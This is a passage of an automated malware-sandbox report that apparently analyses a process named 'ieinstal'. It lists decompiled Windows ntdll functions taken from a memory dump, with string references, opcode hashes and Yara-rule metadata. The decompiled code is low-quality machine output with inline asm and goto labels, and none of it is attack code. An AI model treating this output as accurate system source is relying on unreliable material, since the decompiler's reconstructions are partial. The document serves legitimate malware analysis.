							E1E663BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t86 - 0x5c)));
							if(_t76 >= 0) {
								asm("sbb edi, edi");
								_t76 =  ~( *(_t86 - 0x24) & 0x10) & 0xc000000d;
							}
						} else {
							_t76 = 0xc000003a;
						}
						goto L18;
					} else {
						goto L10;
					}
				} else {
					L10:
					_t76 = 0xc000000d;
					L18:
					_t83 = 0x7ffe0385;
					if(E1E663C40() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t83 & 0x00000001) != 0) {
						if(E1E663C40() != 0) {
							_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						E1E6DFC01(_t86 - 0x58,  *_t61 & 0x000000ff);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t86 - 0x10));
					return _t76;
				}
			}














                                                                                                                0x1e6e3cd4
                                                                                                                0x1e6e3cd6
                                                                                                                0x1e6e3cdb
                                                                                                                0x1e6e3ce0
                                                                                                                0x1e6e3ce4
                                                                                                                0x1e6e3ce5
                                                                                                                0x1e6e3ceb
                                                                                                                0x1e6e3cec
                                                                                                                0x1e6e3cf0
                                                                                                                0x1e6e3cf9
                                                                                                                0x1e6e3cfa
                                                                                                                0x1e6e3cfe
                                                                                                                0x1e6e3d02
                                                                                                                0x1e6e3d10
                                                                                                                0x1e6e3d23
                                                                                                                0x1e6e3d12
                                                                                                                0x1e6e3d1b
                                                                                                                0x1e6e3d1b
                                                                                                                0x1e6e3d2b
                                                                                                                0x1e6e3d5a
                                                                                                                0x1e6e3d2d
                                                                                                                0x1e6e3d2d
                                                                                                                0x1e6e3d32
                                                                                                                0x1e6e3d39
                                                                                                                0x1e6e3d4b
                                                                                                                0x1e6e3d3b
                                                                                                                0x1e6e3d44
                                                                                                                0x1e6e3d44
                                                                                                                0x1e6e3d50
                                                                                                                0x1e6e3d53
                                                                                                                0x1e6e3d53
                                                                                                                0x1e6e3d61
                                                                                                                0x1e6e3d6f
                                                                                                                0x1e6e3d73
                                                                                                                0x1e6e3d78
                                                                                                                0x1e6e3d7b
                                                                                                                0x1e6e3d85
                                                                                                                0x1e6e3d9f
                                                                                                                0x1e6e3dab
                                                                                                                0x1e6e3db2
                                                                                                                0x1e6e3db5
                                                                                                                0x1e6e3dbf
                                                                                                                0x1e6e3dc2
                                                                                                                0x1e6e3dc5
                                                                                                                0x1e6e3dcb
                                                                                                                0x1e6e3dcf
                                                                                                                0x1e6e3dd5
                                                                                                                0x1e6e3de4
                                                                                                                0x1e6e3deb
                                                                                                                0x1e6e3df7
                                                                                                                0x1e6e3df9
                                                                                                                0x1e6e3df9
                                                                                                                0x1e6e3da1
                                                                                                                0x1e6e3da1
                                                                                                                0x1e6e3da1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e3d63
                                                                                                                0x1e6e3d63
                                                                                                                0x1e6e3d63
                                                                                                                0x1e6e3e21
                                                                                                                0x1e6e3e21
                                                                                                                0x1e6e3e2d
                                                                                                                0x1e6e3e38
                                                                                                                0x1e6e3e38
                                                                                                                0x1e6e3e41
                                                                                                                0x1e6e3e4a
                                                                                                                0x1e6e3e55
                                                                                                                0x1e6e3e55
                                                                                                                0x1e6e3e61
                                                                                                                0x1e6e3e61
                                                                                                                0x1e6e3e6b
                                                                                                                0x1e6e3e77
                                                                                                                0x1e6e3e77

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                • API String ID: 0-1373925480
                                                                                                                • Opcode ID: 7c650c2715f9a55eca9929efb04afba9a33b688a1b801cf9b86b00c1c01ea6ff
                                                                                                                • Instruction ID: eae671c26499df0ef8c7721737e3b27695a3144c5d48153c1717ec13d7aee779
                                                                                                                • Opcode Fuzzy Hash: 7c650c2715f9a55eca9929efb04afba9a33b688a1b801cf9b86b00c1c01ea6ff
                                                                                                                • Instruction Fuzzy Hash: AA412332982298CBDB11CFE5C950B9DB7B9EF96700FA0066AD811EF7D1D774A900CB14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E6D1D5E Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 51%
                                                                                                                			E1E6D1D5E(char __ecx) {
				char _v8;
				char _v12;
				signed char _t9;
				void* _t11;
				char _t20;

				_t9 =  *0x1e7437c0; // 0x0
				_t20 = __ecx;
				if((_t9 & 0x00000003) != 0) {
					E1E6CE692("minkernel\\ntdll\\ldrinit.c", 0x79d, "LdrpInitializationFailure", 0, "Process initialization failed with status 0x%08lx\n", __ecx);
					_t9 =  *0x1e7437c0; // 0x0
				}
				if((_t9 & 0x00000010) != 0) {
					asm("int3");
				}
				_t11 = E1E6D0371( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38, 0x1e6311f8);
				if( *0x1e745a9c == 0) {
					_v8 = _t20;
					_push( &_v12);
					_push(1);
					_push( &_v8);
					_push(0);
					_push(1);
					_push(0xc0000145);
					_t11 = E1E694020();
				}
				return _t11;
			}








                                                                                                                0x1e6d1d63
                                                                                                                0x1e6d1d6c
                                                                                                                0x1e6d1d70
                                                                                                                0x1e6d1d89
                                                                                                                0x1e6d1d8e
                                                                                                                0x1e6d1d93
                                                                                                                0x1e6d1d98
                                                                                                                0x1e6d1d9a
                                                                                                                0x1e6d1d9a
                                                                                                                0x1e6d1dac
                                                                                                                0x1e6d1db8
                                                                                                                0x1e6d1dbd
                                                                                                                0x1e6d1dc0
                                                                                                                0x1e6d1dc1
                                                                                                                0x1e6d1dc6
                                                                                                                0x1e6d1dc7
                                                                                                                0x1e6d1dc9
                                                                                                                0x1e6d1dcb
                                                                                                                0x1e6d1dd0
                                                                                                                0x1e6d1dd0
                                                                                                                0x1e6d1dd7

                                                                                                                Strings
                                                                                                                • Process initialization failed with status 0x%08lx, xrefs: 1E6D1D73
                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 1E6D1D84
                                                                                                                • LdrpInitializationFailure, xrefs: 1E6D1D7A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                • API String ID: 0-2986994758
                                                                                                                • Opcode ID: c496fccca3ec5f525e3acd889192b44698f391b4b1e15e35d4eed60115957641
                                                                                                                • Instruction ID: b82810b8130eb53de7af4ff54bd2dcffc6a3fc71cfb8f8fec4934add0d1c5b56
                                                                                                                • Opcode Fuzzy Hash: c496fccca3ec5f525e3acd889192b44698f391b4b1e15e35d4eed60115957641
                                                                                                                • Instruction Fuzzy Hash: F9F0C275901354BBE620DB498CA6FD937A9EB41B65FD00605F68867281C7F0A904CA94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E719ED2 Relevance: 2.8, Strings: 2, Instructions: 348COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 65%
                                                                                                                			E1E719ED2(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v36;
				char _v40;
				signed int _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				char _v88;
				char _v92;
				signed int _v96;
				signed int _v100;
				char _v104;
				signed int _v108;
				signed int _v120;
				void* __ebx;
				signed int _t130;
				signed int _t133;
				void* _t134;
				signed int _t140;
				signed int _t144;
				signed int _t150;
				signed int _t162;
				intOrPtr* _t163;
				signed int _t171;
				signed int _t194;
				void* _t197;
				signed int _t200;
				signed int _t211;
				signed int _t212;
				signed int _t229;
				signed int _t236;
				signed int _t245;
				signed int _t248;
				void* _t252;
				void* _t256;
				signed int _t258;
				unsigned int* _t260;

				_t260 = __ecx;
				_v64 = __edx;
				_t245 = 0;
				_v100 = _v100 & 0;
				_v80 = 0;
				_push( *((intOrPtr*)(__ecx + 4)));
				_push( *((intOrPtr*)(__ecx)));
				_push(0);
				_t197 = 0x14;
				_t194 = E1E7194F9(_t197, _t197);
				if(_t194 == 0) {
					L63:
					__eflags = _v100;
					if(_v100 != 0) {
						_push(_t260[1]);
						_push( *_t260);
						_push(0x8000);
						E1E718845( &_v100,  &_v96);
					}
					goto L65;
				} else {
					_t229 = _a4;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t248 = 0;
					_v92 = 0;
					if(( *(__ecx + 0xc) & 0x04000000) != 0 && 0x1fffff - (_t229 - 0x00000001 & 0x001fffff) < _t229 >> 2) {
						_t248 = 1;
						_v92 = 1;
					}
					while(1) {
						_t200 = 0;
						_v76 = 0;
						if(_t248 == 0) {
							__eflags =  *_t260 >> 8 - 2;
							if( *_t260 >> 8 < 2) {
								__eflags = (_t229 & 0x000fffff) - 1 - 0xfefff;
								if((_t229 & 0x000fffff) - 1 <= 0xfefff) {
									_t200 = 1;
									__eflags = 1;
									_v76 = 1;
								}
							}
							_v84 = _v84 & 0x00000000;
							_t130 = (_t200 << 0xc) + _t229;
							__eflags = _t130;
						} else {
							_v84 = 0x200000;
							_t130 = _t229 - (_t229 - 0x00000001 & 0x001fffff) + 0x1fffff;
						}
						_v96 = _t130;
						if(_t130 < _t229) {
							break;
						}
						_t133 = _t260[3] & 0x40000000;
						asm("sbb edi, edi");
						_t252 = ( ~_t133 & 0x0000003c) + 4;
						if(_t133 != 0) {
							_push(0);
							_push(0x1c);
							_push( &_v60);
							_push(3);
							_push(_t260);
							_push(0xffffffff);
							if(E1E692BE0() < 0 || (_v56 & 0x00000060) == 0 || _v60 != _t260) {
								E1E715FED(0, _t260, 1, _v56, 0, 0);
								_t252 = 4;
							}
						}
						_t134 = E1E718009( &_v100,  &_v96, _v84, 0x2000, _t252,  *_t260, _t260[1]);
						_t277 = _t134;
						if(_t134 < 0) {
							_t114 =  &_v100;
							 *_t114 = _v100 & 0x00000000;
							__eflags =  *_t114;
							break;
						} else {
							_push(_t260[1]);
							_push( *_t260);
							E1E7196CB(_v100,  &_v68, _t277,  &_v88);
							 *_v80 = _t260;
							_t140 = _a4 + 0xfff >> 0xc;
							_v84 = _t140;
							_v96 = _t140 << 0xc;
							if(E1E6868EA(_t260[0x21] + _t260[0x14] << 0xc, _t260,  &(_t260[6])) == 0) {
								break;
							}
							_v96 = 0x1000;
							if(_v100 == 0) {
								__eflags = _a8 & 0x00000002;
								if((_a8 & 0x00000002) != 0) {
									_v96 = 0x40001000;
								}
							} else {
								_t241 = _v92;
								_v96 = 0x20001000;
								_t46 = _t241 - 1; // -1
								_v92 = _v92 + 0x1fffff - (_t46 & 0x001fffff);
							}
							_t144 = _t260[3] & 0x40000000;
							asm("sbb edi, edi");
							_t256 = ( ~_t144 & 0x0000003c) + 4;
							if(_t144 != 0) {
								_push(0);
								_push(0x1c);
								_push( &_v40);
								_push(3);
								_push(_t260);
								_push(0xffffffff);
								if(E1E692BE0() < 0 || (_v36 & 0x00000060) == 0 || _v40 != _t260) {
									E1E715FED(0, _t260, 1, _v36, 0, 0);
									_t256 = 4;
								}
							}
							if(E1E718009( &_v108,  &_v92, 0, _v96, _t256,  *_t260, _t260[1]) >= 0) {
								__eflags = _v100;
								if(_v100 != 0) {
									__eflags = _a8 & 0x00000002;
									if((_a8 & 0x00000002) != 0) {
										E1E698F40(_v108, 0, _a4);
									}
								}
								 *((intOrPtr*)(_t194 + 0xc)) = _v108;
								_t150 = _v84 + _v84;
								_t211 = ( *(_t194 + 0x10) & 0x00000ffd | _v80 << 0x0000000c) & 0xfffffffd | _t150;
								 *(_t194 + 0x10) = _t211;
								asm("bsf eax, [esp+0x14]");
								 *(_t194 + 0x10) = (_t150 << 0x00000002 ^ _t211) & 0x000000fc ^ _t211;
								 *((short*)(_t194 + 0xc)) = (_v80 << 0xc) - _v72;
								_t87 =  &_a8;
								 *_t87 = _a8 & 0x00000001;
								__eflags =  *_t87;
								if( *_t87 == 0) {
									L1E662330( &(_t260[0x10]),  &(_t260[0x10]));
								}
								_t236 =  &(_t260[0x11]);
								__eflags =  *(_t236 + 4) & 0x00000001;
								_t212 =  *_t236;
								if(( *(_t236 + 4) & 0x00000001) != 0) {
									__eflags = _t212;
									if(_t212 == 0) {
										_t212 = 0;
										__eflags = 0;
									} else {
										_t212 = _t212 ^ _t236;
									}
								}
								_t258 =  *(_t236 + 4) & 1;
								_v92 = 0;
								__eflags = _t212;
								if(_t212 == 0) {
									L52:
									L1E66EB80(_t236, _t212, _v92, _t194);
									__eflags = _a8;
									if(_a8 == 0) {
										E1E6624D0( &(_t260[0x10]));
									}
									asm("cdq");
									asm("lock xadd [eax], ecx");
									asm("lock xadd [eax], ecx");
									_t245 = _v108;
									_t194 = 0;
									_v108 = _v108 & 0;
									_t162 = E1E663C40();
									__eflags = _t162;
									if(_t162 == 0) {
										_t163 = 0x7ffe0388;
									} else {
										_t163 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
									}
									__eflags =  *_t163 - _t194;
									if( *_t163 == _t194) {
										L65:
										return _t245;
									} else {
										E1E70DAAF(_t194, _t260, _t245, _v104);
										L61:
										__eflags = _t194;
										if(_t194 != 0) {
											E1E719629(_t194,  *_t260, _t260[1]);
										}
										goto L63;
									}
								} else {
									while(1) {
										__eflags = _v108 - ( *(_t212 + 0xc) & 0xffff0000);
										if(_v108 < ( *(_t212 + 0xc) & 0xffff0000)) {
											goto L46;
										}
										_t171 =  *(_t212 + 4);
										__eflags = _t258;
										if(_t258 == 0) {
											L44:
											__eflags = _t171;
											if(_t171 != 0) {
												L50:
												_t212 = _t171;
												continue;
											}
											L45:
											_v92 = 1;
											goto L52;
										}
										__eflags = _t171;
										if(_t171 == 0) {
											goto L45;
										}
										_t171 = _t171 ^ _t212;
										__eflags = _t171;
										goto L44;
										L46:
										_t171 =  *_t212;
										__eflags = _t258;
										if(_t258 == 0) {
											L49:
											__eflags = _t171;
											if(_t171 == 0) {
												L51:
												_v92 = 0;
												goto L52;
											}
											goto L50;
										}
										__eflags = _t171;
										if(_t171 == 0) {
											goto L51;
										}
										_t171 = _t171 ^ _t212;
										__eflags = _t171;
										goto L49;
									}
								}
							} else {
								if(_v100 == 0) {
									break;
								}
								_push(_t260[1]);
								_t248 = 0;
								_push( *_t260);
								_v100 = 0;
								_push(0x8000);
								E1E718845( &_v108,  &_v104);
								_v120 = _v120 & 0;
								_t229 = _a4;
								continue;
							}
						}
					}
					_t245 = _v80;
					goto L61;
				}
			}











































                                                                                                                0x1e719ee0
                                                                                                                0x1e719ee2
                                                                                                                0x1e719ee6
                                                                                                                0x1e719ee8
                                                                                                                0x1e719eec
                                                                                                                0x1e719ef0
                                                                                                                0x1e719ef3
                                                                                                                0x1e719ef5
                                                                                                                0x1e719ef8
                                                                                                                0x1e719f00
                                                                                                                0x1e719f04
                                                                                                                0x1e71a2b2
                                                                                                                0x1e71a2b2
                                                                                                                0x1e71a2b7
                                                                                                                0x1e71a2b9
                                                                                                                0x1e71a2c0
                                                                                                                0x1e71a2c6
                                                                                                                0x1e71a2cb
                                                                                                                0x1e71a2cb
                                                                                                                0x00000000
                                                                                                                0x1e719f0a
                                                                                                                0x1e719f0a
                                                                                                                0x1e719f16
                                                                                                                0x1e719f17
                                                                                                                0x1e719f18
                                                                                                                0x1e719f19
                                                                                                                0x1e719f1a
                                                                                                                0x1e719f1b
                                                                                                                0x1e719f24
                                                                                                                0x1e719f28
                                                                                                                0x1e719f3a
                                                                                                                0x1e719f3b
                                                                                                                0x1e719f3b
                                                                                                                0x1e719f3f
                                                                                                                0x1e719f3f
                                                                                                                0x1e719f41
                                                                                                                0x1e719f47
                                                                                                                0x1e719f6a
                                                                                                                0x1e719f6c
                                                                                                                0x1e719f76
                                                                                                                0x1e719f7b
                                                                                                                0x1e719f7f
                                                                                                                0x1e719f7f
                                                                                                                0x1e719f80
                                                                                                                0x1e719f80
                                                                                                                0x1e719f7b
                                                                                                                0x1e719f84
                                                                                                                0x1e719f8e
                                                                                                                0x1e719f8e
                                                                                                                0x1e719f49
                                                                                                                0x1e719f4c
                                                                                                                0x1e719f5e
                                                                                                                0x1e719f5e
                                                                                                                0x1e719f90
                                                                                                                0x1e719f96
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e719f9f
                                                                                                                0x1e719fa8
                                                                                                                0x1e719fad
                                                                                                                0x1e719fb2
                                                                                                                0x1e719fb4
                                                                                                                0x1e719fb6
                                                                                                                0x1e719fbc
                                                                                                                0x1e719fbd
                                                                                                                0x1e719fbf
                                                                                                                0x1e719fc0
                                                                                                                0x1e719fc9
                                                                                                                0x1e719fe6
                                                                                                                0x1e719fed
                                                                                                                0x1e719fed
                                                                                                                0x1e719fc9
                                                                                                                0x1e71a005
                                                                                                                0x1e71a00a
                                                                                                                0x1e71a00c
                                                                                                                0x1e71a299
                                                                                                                0x1e71a299
                                                                                                                0x1e71a299
                                                                                                                0x00000000
                                                                                                                0x1e71a012
                                                                                                                0x1e71a012
                                                                                                                0x1e71a01d
                                                                                                                0x1e71a024
                                                                                                                0x1e71a02d
                                                                                                                0x1e71a040
                                                                                                                0x1e71a045
                                                                                                                0x1e71a054
                                                                                                                0x1e71a05f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e71a06a
                                                                                                                0x1e71a072
                                                                                                                0x1e71a094
                                                                                                                0x1e71a098
                                                                                                                0x1e71a09a
                                                                                                                0x1e71a09a
                                                                                                                0x1e71a074
                                                                                                                0x1e71a074
                                                                                                                0x1e71a07d
                                                                                                                0x1e71a085
                                                                                                                0x1e71a08e
                                                                                                                0x1e71a08e
                                                                                                                0x1e71a0a5
                                                                                                                0x1e71a0ae
                                                                                                                0x1e71a0b3
                                                                                                                0x1e71a0b8
                                                                                                                0x1e71a0ba
                                                                                                                0x1e71a0bc
                                                                                                                0x1e71a0c2
                                                                                                                0x1e71a0c3
                                                                                                                0x1e71a0c5
                                                                                                                0x1e71a0c6
                                                                                                                0x1e71a0cf
                                                                                                                0x1e71a0ec
                                                                                                                0x1e71a0f3
                                                                                                                0x1e71a0f3
                                                                                                                0x1e71a0cf
                                                                                                                0x1e71a10f
                                                                                                                0x1e71a145
                                                                                                                0x1e71a14a
                                                                                                                0x1e71a14c
                                                                                                                0x1e71a150
                                                                                                                0x1e71a15b
                                                                                                                0x1e71a160
                                                                                                                0x1e71a150
                                                                                                                0x1e71a16a
                                                                                                                0x1e71a180
                                                                                                                0x1e71a185
                                                                                                                0x1e71a187
                                                                                                                0x1e71a18a
                                                                                                                0x1e71a19b
                                                                                                                0x1e71a1a9
                                                                                                                0x1e71a1ad
                                                                                                                0x1e71a1ad
                                                                                                                0x1e71a1ad
                                                                                                                0x1e71a1b1
                                                                                                                0x1e71a1b7
                                                                                                                0x1e71a1b7
                                                                                                                0x1e71a1bc
                                                                                                                0x1e71a1bf
                                                                                                                0x1e71a1c3
                                                                                                                0x1e71a1c5
                                                                                                                0x1e71a1c7
                                                                                                                0x1e71a1c9
                                                                                                                0x1e71a1cf
                                                                                                                0x1e71a1cf
                                                                                                                0x1e71a1cb
                                                                                                                0x1e71a1cb
                                                                                                                0x1e71a1cb
                                                                                                                0x1e71a1c9
                                                                                                                0x1e71a1d5
                                                                                                                0x1e71a1d8
                                                                                                                0x1e71a1dd
                                                                                                                0x1e71a1df
                                                                                                                0x1e71a220
                                                                                                                0x1e71a227
                                                                                                                0x1e71a22c
                                                                                                                0x1e71a230
                                                                                                                0x1e71a236
                                                                                                                0x1e71a236
                                                                                                                0x1e71a23f
                                                                                                                0x1e71a24f
                                                                                                                0x1e71a25a
                                                                                                                0x1e71a25e
                                                                                                                0x1e71a262
                                                                                                                0x1e71a264
                                                                                                                0x1e71a268
                                                                                                                0x1e71a26d
                                                                                                                0x1e71a26f
                                                                                                                0x1e71a281
                                                                                                                0x1e71a271
                                                                                                                0x1e71a27a
                                                                                                                0x1e71a27a
                                                                                                                0x1e71a286
                                                                                                                0x1e71a288
                                                                                                                0x1e71a2d0
                                                                                                                0x1e71a2d8
                                                                                                                0x1e71a28a
                                                                                                                0x1e71a292
                                                                                                                0x1e71a2a2
                                                                                                                0x1e71a2a2
                                                                                                                0x1e71a2a4
                                                                                                                0x1e71a2ad
                                                                                                                0x1e71a2ad
                                                                                                                0x00000000
                                                                                                                0x1e71a2a4
                                                                                                                0x00000000
                                                                                                                0x1e71a1e1
                                                                                                                0x1e71a1e9
                                                                                                                0x1e71a1ed
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e71a1ef
                                                                                                                0x1e71a1f2
                                                                                                                0x1e71a1f4
                                                                                                                0x1e71a1fc
                                                                                                                0x1e71a1fc
                                                                                                                0x1e71a1fe
                                                                                                                0x1e71a217
                                                                                                                0x1e71a217
                                                                                                                0x00000000
                                                                                                                0x1e71a217
                                                                                                                0x1e71a200
                                                                                                                0x1e71a200
                                                                                                                0x00000000
                                                                                                                0x1e71a200
                                                                                                                0x1e71a1f6
                                                                                                                0x1e71a1f8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e71a1fa
                                                                                                                0x1e71a1fa
                                                                                                                0x00000000
                                                                                                                0x1e71a207
                                                                                                                0x1e71a207
                                                                                                                0x1e71a209
                                                                                                                0x1e71a20b
                                                                                                                0x1e71a213
                                                                                                                0x1e71a213
                                                                                                                0x1e71a215
                                                                                                                0x1e71a21b
                                                                                                                0x1e71a21b
                                                                                                                0x00000000
                                                                                                                0x1e71a21b
                                                                                                                0x00000000
                                                                                                                0x1e71a215
                                                                                                                0x1e71a20d
                                                                                                                0x1e71a20f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e71a211
                                                                                                                0x1e71a211
                                                                                                                0x00000000
                                                                                                                0x1e71a211
                                                                                                                0x1e71a1e1
                                                                                                                0x1e71a111
                                                                                                                0x1e71a116
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e71a11c
                                                                                                                0x1e71a11f
                                                                                                                0x1e71a125
                                                                                                                0x1e71a12b
                                                                                                                0x1e71a12f
                                                                                                                0x1e71a134
                                                                                                                0x1e71a139
                                                                                                                0x1e71a13d
                                                                                                                0x00000000
                                                                                                                0x1e71a13d
                                                                                                                0x1e71a10f
                                                                                                                0x1e71a00c
                                                                                                                0x1e71a29e
                                                                                                                0x00000000
                                                                                                                0x1e71a29e

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `$`
                                                                                                                • API String ID: 0-197956300
                                                                                                                • Opcode ID: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
                                                                                                                • Instruction ID: d33d196f9b1cbc47d534a252519614c6ac4369419dc7c21aac6d209fb98fe9f3
                                                                                                                • Opcode Fuzzy Hash: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
                                                                                                                • Instruction Fuzzy Hash: 97C1CF312083829BF714CF24C851B6BBBE6AFC4758F044B2DF995CA2A0D775E945CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E682DBC Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • RtlpInsertAssemblyStorageMapEntry, xrefs: 1E6C2611
                                                                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 1E6C2616
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                                                                • API String ID: 0-2104531740
                                                                                                                • Opcode ID: 33f6f285874ce635048ff656d5a48e101b83a11b655ee498a22165b9311a6b36
                                                                                                                • Instruction ID: e270945f0ac20d54bf89564c9048467bb7a7c1d967548a2aeb463af2a7e6b9b3
                                                                                                                • Opcode Fuzzy Hash: 33f6f285874ce635048ff656d5a48e101b83a11b655ee498a22165b9311a6b36
                                                                                                                • Instruction Fuzzy Hash: E541E276A00A11EBD714CF45C860E6BB3B6FF99F10F918629ED499B241E730EC41CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E690F16 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control, xrefs: 1E690F45
                                                                                                                • @, xrefs: 1E690F70
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$\Registry\Machine\System\CurrentControlSet\Control
                                                                                                                • API String ID: 0-2976085014
                                                                                                                • Opcode ID: 3580e3eddaab0dc830d19e9e6f85602e3d213cecea568a491b3745b3142cc4e8
                                                                                                                • Instruction ID: 2bca5ef8e99a348acdf96692378f92c52b087beef0fce4a550932420d66fed2a
                                                                                                                • Opcode Fuzzy Hash: 3580e3eddaab0dc830d19e9e6f85602e3d213cecea568a491b3745b3142cc4e8
                                                                                                                • Instruction Fuzzy Hash: C9319F72901188AFCB22DF95C854F9FBBBCEB84B10F810A25F500AB250DB34ED01DBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E652EE8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PATH
                                                                                                                • API String ID: 0-1036084923
                                                                                                                • Opcode ID: 9c7dceb011f4d874ccce08fd0267a5a1e4efb02b33717ffc78adfd760006cadb
                                                                                                                • Instruction ID: d015fb03705e089d4d545b8eecb8a5b3e0fd272be93243d50e12a4993709e578
                                                                                                                • Opcode Fuzzy Hash: 9c7dceb011f4d874ccce08fd0267a5a1e4efb02b33717ffc78adfd760006cadb
